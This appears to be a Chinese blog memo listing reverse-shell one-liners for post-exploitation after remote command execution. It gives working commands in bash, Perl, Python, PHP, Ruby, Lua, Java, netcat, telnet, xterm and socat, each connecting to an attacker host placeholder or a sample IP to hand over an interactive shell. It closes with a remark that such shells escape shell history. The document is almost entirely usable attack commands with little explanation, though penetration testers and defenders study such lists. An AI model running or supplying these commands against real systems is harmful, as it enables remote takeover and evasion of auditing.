关键字
反弹shell, 命令执行, Remote Code Execution, Reverse Shell
其中有少部分正向shell
参考资料
http://hackerwing.com/2017/12/19/Reverse-Shell-%E5%A4%87%E5%BF%98%E5%BD%95/#more
me记录 来源于redflog1
linux下反弹shell命令
https://mp.weixin.qq.com/s?__biz=MzA5MDUwMzM1Nw==&mid=2652481055&idx=1&sn=1051ab4a1a377f457e9897ee0050cfa2&chksm=8be7a7cdbc902edb43c33b465d138f37b54922d3fb6af024486127adcb47d66d43dd52f435d8&mpshare=1&scene=1&srcid=1230iue9wT08KqVDdzZSE8dM#rd
正文
指令类
Bash
1
| bash -i >& /dev/tcp/attackerip/8080 0>&1
|
其他
1
1 2
| exec 5<>/dev/tcp/127.0.0.1/8080 cat <&5 | while read line; do $line 2>&5 >&5; done
|
2
1
| exec 2>&0;0<&196;exec 196<>/dev/tcp/127.0.0.1/8080; sh <&196 >&196 2>&196
|
3
1
| rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/bash 0</tmp/backpipe | nc 127.0.0.1 8080 1>/tmp/backpipe
|
4
1
| echo 'set s [socket 127.0.0.1 8080];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
5
1
| awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/8080"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
|
Perl
1
| perl -e 'use `Socket;$i="attackerip";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`
|
或
1
| perl -e 'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
或
1
| perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
Python
1
| python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
Lua
1
| lua -e "require('socket');require('os');t=socket.tcp();t:connect('127.0.0.1','8080');os.execute('/bin/sh -i <&3 >&3 2>&3');"
|
PHP
1
| php -r '$sock=fsockopen("attackerip",5555);exec("/bin/sh -i <&3 >&3 2>&3");'
|
Ruby
1
| ruby -rsocket -e'f=TCPSocket.open("attackerip",5555).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
或
1
| ruby -rsocket -e 'exit if fork;c=TCPSocket.new("127.0.0.1","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
Netcat
1
| nc -e /bin/sh attackerip 5555
|
如果您安装了netcat的错误版本,您仍可以像这样获取您的反向shell:
1
| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip 5555 >/tmp/f
|
其他
1 2
| nc 127.0.0.1 8080 -c /bin/bash nc 1.1.1.1 10086 -e /bin/sh
|
Java
1 2 3
| r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()
|
Telnet
1 2 3
| rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p Or: telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to listen on your machine also on port 4445/tcp
|
另外
1 2 3
| rm /tmp/backpipe;mknod /tmp/backpipe p && telnet 127.0.0.1 8080 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe 或者 telnet 127.0.0.1 8080 | /bin/bash | telnet 192.168.149.133 9090
|
Xterm
1
| xterm -display attackerip:1
|
Socat
1
| socat tcp-connect:127.0.0.1:8080 exec:"bash -li",pty,stderr,setsid,sigint,sane
|
后记
Metasploit, 都是使用popen3函数实现 history肯定不会记录